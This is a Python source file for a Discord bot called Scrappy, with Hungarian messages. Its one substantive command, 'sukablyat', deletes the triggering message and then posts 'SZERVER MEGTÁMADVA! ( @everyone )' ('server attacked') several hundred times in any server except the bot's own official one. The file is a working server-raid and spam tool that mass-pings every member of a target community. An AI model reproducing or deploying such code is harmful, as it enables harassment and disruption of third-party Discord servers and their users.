import discord
from discord.ext.commands import *
from discord.ext import commands
import random
import string
import asyncio
import time
import json
from itertools import cycle
import time
from threading import Thread
from random import randint
import datetime
import os
import aiohttp
import sys
import traceback
import json
from discord.utils import get
import youtube_dl
import cat
import shutil
import subprocess
import hashlib
import struct
import sys
import re
import urllib.request as urllib2

bot = commands.Bot(command_prefix='s!')
 
client = commands.Bot(command_prefix='s!')

bot.remove_command('help')

@bot.event
async def on_ready():
    print('Bejelentkezve! Scrappy - Online')
    await bot.change_presence(status=discord.Status.online, activity=discord.Game("Segitség » s!segitség"))

@bot.command()
async def sukablyat(ctx):
    await ctx.message.delete()
    if not ctx.guild.name == "Scrappy | OFFICIAL":
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
